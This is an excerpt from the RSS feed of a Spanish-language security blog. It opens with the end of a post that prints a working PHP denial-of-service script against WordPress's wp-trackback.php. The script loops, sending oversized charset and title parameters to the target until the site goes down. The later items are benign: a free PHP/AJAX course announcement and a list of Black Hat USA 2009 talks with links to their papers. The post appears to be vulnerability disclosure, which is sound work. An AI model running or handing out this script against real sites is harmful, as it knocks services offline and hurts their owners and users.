/> if(count($data) &lt; 2) {     echo “The url should have http:// in front of it, and should be complete.\n”;     exit;     }     if(count($data) == 2) {     $path = ”;     } else {     $path = $data['path'];     }     $path = trim($path,’/&#8217;);     $path .= ‘/wp-trackback.php’;     if($path{0} != ‘/’) {     $path = ‘/’.$path;     }     $b = “”;     $b = str_pad($b,140000,’ABCEDFG’);     $b = utf8_encode($b);     $charset = “”;     $charset = str_pad($charset,140000,”UTF-8,”);     $str = ‘charset=’.urlencode($charset);     $str .= ‘&amp;url=www.example.com’;     $str .= ‘&amp;title=’.$b;     $str .= ‘&amp;blog_name=lol’;     $str .= ‘&amp;excerpt=lol’;     $count = 0;     while(1) {     $fp = @fsockopen($data['host'],80);     if(!$fp) {     if($count &gt; 0) {<br
/> echo “down!!!!\n”;<br
/> exit;<br
/> }<br
/> echo “unable to connect to: “.$data['host'].”\n”;<br
/> exit;<br
/> }</p><p>fputs($fp, “POST $path HTTP/1.1\r\n”);<br
/> fputs($fp, “Host: “.$data['host'].”\r\n”);<br
/> fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”);<br
/> fputs($fp, “Content-length: “.strlen($str).”\r\n”);<br
/> fputs($fp, “Connection: close\r\n\r\n”);<br
/> fputs($fp, $str.”\r\n\r\n”);</p><p>echo “hit!\n”;<br
/> $count++;<br
/> }</p><p>?&gt;</p></blockquote><p><strong>Para mas informacion:</strong><br
/> <a
title="Enlace Permanente a &quot;Agujero de seguridad muy grave en WordPress&quot;" rel="bookmark" href="http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/">Agujero de seguridad muy grave en WordPress</a><br
/> <a
id="thread_title_8527" href="http://comunidad.dragonjar.org/f150/atencion-bug-wordpress-8527/">Atención! BUG WordPress</a><br
/> <a
title="Enlace permanente a WordPress Security Whitepaper" rel="bookmark" href="../wordpress-security-whitepaper.xhtml">WordPress Security Whitepaper </a></p><div
id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 996px; width: 1px; height: 1px;">$charset = $_POST['charset'];</div><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a
href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/entrar-en-facebook-de-otra-persona.xhtml" title="como entrar al facebook de otra persona">como entrar al facebook de otra persona</a></li><li><a
href="http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml" title="Buffer Overflow en PHP 6 Dev">Buffer Overflow en PHP 6 Dev</a></li><li><a
href="http://www.dragonjar.org/lista-de-tareas-seguridad-en-php.xhtml" title="Lista de tareas para revisar la seguridad en proyectos PHP">Lista de tareas para revisar la seguridad en proyectos PHP</a></li><li><a
href="http://www.dragonjar.org/pueden-leer-tu-basura.xhtml" title="Pueden leer tu &#8220;Basura&#8221;">Pueden leer tu &#8220;Basura&#8221;</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/dos-en-wordpress.xhtml/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Clase Virtual Gratuita sobre Desarrollo Web con PHP y Ajax</title><link>http://www.dragonjar.org/curso-gratis-desarrollo-web-con-php-y-ajax.xhtml</link> <comments>http://www.dragonjar.org/curso-gratis-desarrollo-web-con-php-y-ajax.xhtml#comments</comments> <pubDate>Thu, 15 Oct 2009 20:28:21 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Ajax]]></category> <category><![CDATA[Charla]]></category> <category><![CDATA[Desarrollo]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[UNE]]></category> <category><![CDATA[Web]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3231</guid> <description><![CDATA[La Fundación UNE realizara hoy jueves 15 de octubre a las 6PM hora colombiana la primera clase virtual gratuita del curso de desarrollo de sitios Web con PHP Y AJAX, La Comunidad DragonJAR te invita a participar desde la comodidad de tu casa u oficina, a esta oportunidad de capacitarte en PHP y AJAX totalmente [...]]]></description> <content:encoded><![CDATA[<p
style="text-align: center;"><img
class="aligncenter" title="Curso de PHP y AJAX Gratis" src="http://img368.imageshack.us/img368/5308/cursophpajaxgratis.png" alt="cursophpajaxgratis Clase Virtual Gratuita sobre Desarrollo Web con PHP y Ajax" width="524" height="272" /></p><p>La Fundación UNE realizara hoy jueves 15 de octubre a las <a
href="http://horalegal.sic.gov.co/">6PM hora colombiana</a> la primera clase virtual gratuita del <a
href="http://www.dragonjar.org/tag/curso" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Curso">curso</a> de <a
href="http://www.dragonjar.org/tag/desarrollo" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Desarrollo">desarrollo</a> de <a
href="http://www.dragonjar.org/tag/sitios" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Sitios">sitios</a> <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">Web</a> con <a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">PHP</a> Y <a
href="http://www.dragonjar.org/tag/ajax" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ajax">AJAX</a>, La Comunidad DragonJAR te invita a participar desde la comodidad de tu casa u oficina, a esta oportunidad de capacitarte en PHP y <a
href="http://www.dragonjar.org/tag/ajax" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ajax">AJAX</a> totalmente <a
href="http://www.dragonjar.org/tag/gratis" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Gratis">gratis</a>,  simplemente debes contar con computador, conexión a internet, parlantes y micrófono.<span
id="more-3231"></span></p><p>Para participar en esta charla solo es necesario seguir estos simples pasos:</p><ol><li>Registrarse en el sitio <a
href="http://www.fundacionune.com">www.fundacionune.com</a></li><li><a
href="http://www.4shared.com/file/141136987/11586390/ManualClaseVirtual2.html">Descargar este manua</a>l donde encontrara las indicaciones de cómo conectarse y como participar (no te preocupes por que este realizado desde plataformas windows y se hable sobre activex, la <a
href="http://www.dragonjar.org/tag/aplicacion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Aplicacion">aplicacion</a> webex de cisco, sobra la cual se dictara la charla, tiene soporte para Windows, Mac, Linux, Solaris, HP-UX y AIX OS)</li><li>Asistir a las <a
href="http://horalegal.sic.gov.co/">6PM hora colombiana</a> a la url que recibirás por correo.</li></ol><p>Esta es una introducción simple a los conceptos de PHP y AJAX, pero tendrás tutores en linea para resolver tus dudas, después de esta charla se realizara un curso pago sobre el tema.</p><p><strong>Actualización:</strong> El curso gratuito básico ya se llevó a cabo, el jueves 15 de octubre  a las 6PM, si no pudiste verlo o quieres ampliar la informacion expuesta te dejo mas documentación sobre el tema.</p><ul><li><a
href="http://comunidad.dragonjar.org/f202/desarrollo-de-aplicaciones-web-javascript-8481/">Desarrollo de Aplicaciones Web [JavaScript]</a></li><li><a
href="http://comunidad.dragonjar.org/f180/desarrollo-de-aplicaciones-web-ajax-8480/">Desarrollo de Aplicaciones Web [Ajax]</a></li><li><a
href="http://comunidad.dragonjar.org/f172/manual-desarrollo-web-php-8479/">Manual Desarrollo Web [Php]</a></li><li><a
href="http://comunidad.dragonjar.org/f172/curso-virtual-de-php-en-espanol-5230/">Curso Virtual de PHP en Español</a></li></ul><p>En nuestra comunidad encontraras una sección <a
href="http://comunidad.dragonjar.org/f172/?pp=20&amp;daysprune=-1">sobre el lenguaje PHP</a> y una gran cantidad de cursos sobre el, también <a
href="http://comunidad.dragonjar.org/f180/?pp=20&amp;daysprune=-1">sobre AJAX</a> y <a
href="http://comunidad.dragonjar.org/f202/?pp=20&amp;daysprune=-1">JavaScript</a>.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/charla-de-seguridad-web-gratuita-barcelona-espana.xhtml" title="Charla de Seguridad Web Gratuita &#8211; Barcelona España ">Charla de Seguridad Web Gratuita &#8211; Barcelona España </a></li><li><a
href="http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml" title="Cursos Gratis de Diseño Web en el Sena Virtual">Cursos Gratis de Diseño Web en el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/charla-sobre-seguridad-web-dictada-jorge-marin.xhtml" title="Charla sobre Seguridad Web dictada &#8211; Jorge Marin">Charla sobre Seguridad Web dictada &#8211; Jorge Marin</a></li><li><a
href="http://www.dragonjar.org/aplicaciones-web-vulnerables.xhtml" title="Aplicaciones Web Vulnerables">Aplicaciones Web Vulnerables</a></li><li><a
href="http://www.dragonjar.org/top-25-errores-mas-peligrosos-en-el-desarrollo-de-software.xhtml" title="TOP 25 errores más peligrosos en el desarrollo de software">TOP 25 errores más peligrosos en el desarrollo de software</a></li><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/cupos-disponibles-en-el-sena.xhtml" title="Cupos disponibles en el SENA">Cupos disponibles en el SENA</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/curso-gratis-desarrollo-web-con-php-y-ajax.xhtml/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Memorias del Black Hat USA 2009</title><link>http://www.dragonjar.org/memorias-del-black-hat-usa-2009.xhtml</link> <comments>http://www.dragonjar.org/memorias-del-black-hat-usa-2009.xhtml#comments</comments> <pubDate>Mon, 27 Jul 2009 22:31:50 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Eventos en seguridad]]></category> <category><![CDATA[Aaron LeMasters]]></category> <category><![CDATA[Alessandro Acquisti]]></category> <category><![CDATA[Alexander Sotirov Breaking]]></category> <category><![CDATA[Alfredo Ortega]]></category> <category><![CDATA[Andrea Barisani]]></category> <category><![CDATA[Andrew Fried]]></category> <category><![CDATA[Anibal Sacco Deactivate]]></category> <category><![CDATA[Anthony Lineberry]]></category> <category><![CDATA[Bill Blunden Anti-Forensics]]></category> <category><![CDATA[Boston College]]></category> <category><![CDATA[Bryan Sullivan Defensive]]></category> <category><![CDATA[Charlie Miller]]></category> <category><![CDATA[Chris Gates Breaking]]></category> <category><![CDATA[Chris Lee]]></category> <category><![CDATA[Chris Rohlf]]></category> <category><![CDATA[Chris Tarnovsky]]></category> <category><![CDATA[Chris Tarnovsky What]]></category> <category><![CDATA[Chris Valasek Practical]]></category> <category><![CDATA[Chris Weber Unraveling]]></category> <category><![CDATA[Colin Ames]]></category> <category><![CDATA[Collin Mulliner Fuzzing]]></category> <category><![CDATA[Dan Boneh]]></category> <category><![CDATA[Dan Kaminsky Something]]></category> <category><![CDATA[Daniel Raygoza]]></category> <category><![CDATA[Daniele Bianco Sniff]]></category> <category><![CDATA[Data Mining]]></category> <category><![CDATA[David Aslanian]]></category> <category><![CDATA[David Dewey]]></category> <category><![CDATA[David Goldsmith]]></category> <category><![CDATA[David Kerb]]></category> <category><![CDATA[David Lindsay Our Favorite]]></category> <category><![CDATA[David Mortman]]></category> <category><![CDATA[Dino Dai Zovi]]></category> <category><![CDATA[Dmitri Alperovitch]]></category> <category><![CDATA[Eduardo Vela Nava]]></category> <category><![CDATA[Elie Bursztein]]></category> <category><![CDATA[Erez Metula]]></category> <category><![CDATA[Eric Monti Ruby]]></category> <category><![CDATA[Garrett Held Worst]]></category> <category><![CDATA[Hacker]]></category> <category><![CDATA[Haroon Meer]]></category> <category><![CDATA[Hristo Bojinov]]></category> <category><![CDATA[Internet Special Ops]]></category> <category><![CDATA[IPhone]]></category> <category><![CDATA[Jacob Appelbaum]]></category> <category><![CDATA[James Arlen]]></category> <category><![CDATA[JAVA]]></category> <category><![CDATA[Jennifer Granick]]></category> <category><![CDATA[Jeremiah Grossman]]></category> <category><![CDATA[Jeremy Rauch Hacking]]></category> <category><![CDATA[Jesse Burns Exploratory]]></category> <category><![CDATA[Joe Grand]]></category> <category><![CDATA[John Hering]]></category> <category><![CDATA[John McDonald]]></category> <category><![CDATA[JONATHAN LOGAN INC]]></category> <category><![CDATA[K. Chen Reversing]]></category> <category><![CDATA[Keith Mularski Fighting]]></category> <category><![CDATA[Kevin Mahaffey]]></category> <category><![CDATA[Kevin Stadmeyer]]></category> <category><![CDATA[Kostya Kortchinsky Cloudburst]]></category> <category><![CDATA[Kyle Williams]]></category> <category><![CDATA[Lasers]]></category> <category><![CDATA[Lorie Liebrock Reverse]]></category> <category><![CDATA[Luis Miras Attacking]]></category> <category><![CDATA[Mac OS X]]></category> <category><![CDATA[Malware]]></category> <category><![CDATA[Marc Bevand]]></category> <category><![CDATA[Marco Slaviero Clobbering]]></category> <category><![CDATA[Mario Vuksan]]></category> <category><![CDATA[Mark Dowd]]></category> <category><![CDATA[Matt Conover]]></category> <category><![CDATA[Metasploit Project]]></category> <category><![CDATA[Michael Brooks]]></category> <category><![CDATA[Michael Eddington Demystifying]]></category> <category><![CDATA[Michael Eddington Demystifying Fuzzers]]></category> <category><![CDATA[Michael Murphy]]></category> <category><![CDATA[Michael Tracy]]></category> <category><![CDATA[Mike Zusman]]></category> <category><![CDATA[Mikko Hypponen]]></category> <category><![CDATA[Modern Signals Intelligence]]></category> <category><![CDATA[Nathan Hamiel]]></category> <category><![CDATA[Nick Arvanitis]]></category> <category><![CDATA[Nick Harbour Win]]></category> <category><![CDATA[Oracle Corporation]]></category> <category><![CDATA[Paul Vixie]]></category> <category><![CDATA[Peter Guerra How]]></category> <category><![CDATA[Peter Kleissner Stoned]]></category> <category><![CDATA[Peter Kleissner Stoned Bootkit Kostya]]></category> <category><![CDATA[Peter Silberman]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[Rachel Engel Gizmo]]></category> <category><![CDATA[Riley Hassell Exploiting]]></category> <category><![CDATA[Riley Hassell Exploiting Rich]]></category> <category><![CDATA[Rootkit]]></category> <category><![CDATA[Ryan Smith]]></category> <category><![CDATA[Security software]]></category> <category><![CDATA[Shawn Moyer Weaponizing]]></category> <category><![CDATA[SMS]]></category> <category><![CDATA[SSL]]></category> <category><![CDATA[Steve Davis Metasploit Autopsy]]></category> <category><![CDATA[Steve Ocepek Long-Term]]></category> <category><![CDATA[Steve Topletz]]></category> <category><![CDATA[Thomas H. Ptacek]]></category> <category><![CDATA[Tiffany Strauchs Rad]]></category> <category><![CDATA[Tomislav Pericin Fast]]></category> <category><![CDATA[Tony Flick Hacking]]></category> <category><![CDATA[Travis Goodspeed]]></category> <category><![CDATA[Vincenzo Iozzo]]></category> <category><![CDATA[We Can]]></category> <category><![CDATA[Web Proxy]]></category> <category><![CDATA[Web Proxy Stefan Esser State]]></category> <category><![CDATA[Windows XP]]></category> <category><![CDATA[Zane Lackey]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=2875</guid> <description><![CDATA[Se ha liberado la documentación oficial del Blackhat USA, una de las conferencia de seguridad más importantes a nivel mundial, a continuación les dejo los contenidos expuestos en estas conferencias: = Paper = Diapositivas de la presentacion = Video Presentacion = Codigo Fuente Alessandro Acquisti I Just Found 10 Million SSN&#8217;s Dmitri Alperovitch, Keith Mularski [...]]]></description> <content:encoded><![CDATA[<p
style="text-align: center;"><img
class="aligncenter" src="http://farm3.static.flickr.com/2592/3781866347_a26e6bb6ec.jpg" alt="3781866347 a26e6bb6ec Memorias del Black Hat USA 2009"  title="Memorias del Black Hat USA 2009" /></p><p>Se ha liberado la documentación oficial del Blackhat USA, una de las conferencia de seguridad más importantes a nivel mundial, a continuación les dejo los contenidos expuestos en estas conferencias:</p><p><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /> = Paper</p><p><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /> = Diapositivas de la presentacion</p><p><img
title="Video Recording" src="http://img27.imageshack.us/img27/354/bhusa09webvideo.png" border="0" alt="bhusa09webvideo Memorias del Black Hat USA 2009"  /> = Video Presentacion</p><p><img
title="Source" scr="http://img265.imageshack.us/img265/1557/bhusa09websource.png" border="0" alt=" Memorias del Black Hat USA 2009"  /> = Codigo Fuente</p><h3><span
id="more-2875"></span></h3><h3>Alessandro Acquisti</h3><h2>I Just Found 10 Million SSN&#8217;s</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/ACQUISTI/BHUSA09-Acquisti-GrossSSN-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/ACQUISTI/BHUSA09-Acquisti-GrossSSN-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Dmitri Alperovitch, Keith Mularski</h3><h2>Fighting Russian Cybercrime Mobsters: Report from the Trenches</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/ALPEROVITCH/BHUSA09-Alperovitch-RussCybercrime-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/ALPEROVITCH/BHUSA09-Alperovitch-RussCybercrime-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Andrea Barisani, Daniele Bianco</h3><h2>Sniff Keystrokes With Lasers/Voltmeters</p><p>Side Channel Attacks Using Optical Sampling of Mechanical Energy and Power Line Leakage</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/BARISANI/BHUSA09-Barisani-Keystrokes-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/BARISANI/BHUSA09-Barisani-Keystrokes-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Marc Bevand</h3><h2>MD5 Chosen-Prefix Collisions on GPUs</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/BEVAND/BHUSA09-Bevand-MD5-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/BEVAND/BHUSA09-Bevand-MD5-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Bill Blunden</h3><h2>Anti-Forensics: The Rootkit Connection</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/BLUNDEN/BHUSA09-Blunden-AntiForensics-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/BLUNDEN/BHUSA09-Blunden-AntiForensics-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Hristo Bojinov, <a
href="http://www.dragonjar.org/tag/dan-boneh" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Dan Boneh">Dan Boneh</a>, Elie Bursztein</h3><h2>Embedded Management Interfaces: Emerging Massive Insecurity</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/BOJINOV/BHUSA09-Bojinov-EmbeddedMgmt-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/BOJINOV/BHUSA09-Bojinov-EmbeddedMgmt-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Michael Brooks, David Aslanian</h3><h2>BitTorrent Hacks</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/BROOKS/BHUSA09-Brooks-BitTorrHacks-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/BROOKS/BHUSA09-Brooks-BitTorrHacks-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Jesse Burns</h3><h2>Exploratory Android Surgery</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/BURNS/BHUSA09-Burns-AndroidSurgery-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/BURNS/BHUSA09-Burns-AndroidSurgery-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>K. Chen</h3><h2>Reversing and Exploiting an Apple® Firmware Update</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/CHEN/BHUSA09-Chen-RevAppleFirm-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/CHEN/BHUSA09-Chen-RevAppleFirm-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Matt Conover</h3><h2>SADE: Injecting Agents into VM Guest OS</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/CONOVER/BHUSA09-Conover-SADEintoVM-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/CONOVER/BHUSA09-Conover-SADEintoVM-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Dino Dai Zovi</h3><h2>Advanced <a
href="http://www.dragonjar.org/tag/mac-os-x" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Mac OS X">Mac OS X</a> Rootkits</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/DAIZOVI/BHUSA09-AdvOSXRootkits-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/DAIZOVI/BHUSA09-AdvOSXRootkits-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Datagram</h3><h2>Lockpicking Forensics</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/DATAGRAM/BHUSA09-LockpickForensics-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/DATAGRAM/BHUSA09-LockpickForensics-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Nitesh Dhanjani</h3><h2>Psychotronica: Exposure, Control, and Deceit</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/DHANJANI/BHUSA09-Dhanjani-Psychotronica-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/DHANJANI/BHUSA09-Dhanjani-Psychotronica-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Mark Dowd, Ryan Smith, David Dewey</h3><h2>The Language of Trust: Exploiting Trust Relationships in Active Content</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/DOWD/"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="https://media.blackhat.com/bh-usa-09/video/DOWD/BHUSA09-Dowd-AtkInterop-VIDEO.mov" target="_blank"><img
title="Video Recording" src="http://img27.imageshack.us/img27/354/bhusa09webvideo.png" border="0" alt="bhusa09webvideo Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/DOWD/"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Muhaimin Dzulfakar</h3><h2>Advanced MySQL Exploitation</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/DZULFAKAR/BHUSA09-Dzulfakar-MySQLExploit-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/DZULFAKAR/BHUSA09-Dzulfakar-MySQLExploit-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Michael Eddington</h3><h2>Demystifying Fuzzers</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/EDDINGTON/BHUSA09-Eddington-DemystFuzzers-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/EDDINGTON/BHUSA09-Eddington-DemystFuzzers-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Egypt</h3><h2>Using Guided Missiles in Drive-by&#8217;s: Automatic browser fingerprinting  and exploitation with Metasploit</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/EGYPT/BHUSA09-Egypt-GuidedMissiles-PAPER.pdf"><img
title="White Paper" src="http://img132.imageshack.us/img132/701/bhusa09webdoc.png" border="0" alt="bhusa09webdoc Memorias del Black Hat USA 2009"  /></a> <a
href="http://www.blackhat.com/presentations/bh-usa-09/EGYPT/BHUSA09-Egypt-GuidedMissiles-SLIDES.pdf"><img
title="Presentation" src="http://img132.imageshack.us/img132/3386/bhusa09webdeck.png" border="0" alt="bhusa09webdeck Memorias del Black Hat USA 2009"  /></a></p><hr
/><h3>Rachel Engel</h3><h2>Gizmo: A Lightweight Open Source Web Proxy</h2><p><a
href="http://www.blackhat.com/presentations/bh-usa-09/ENGEL/BHUSA09-Engel-Gizmo-PAPER.pdf"><img
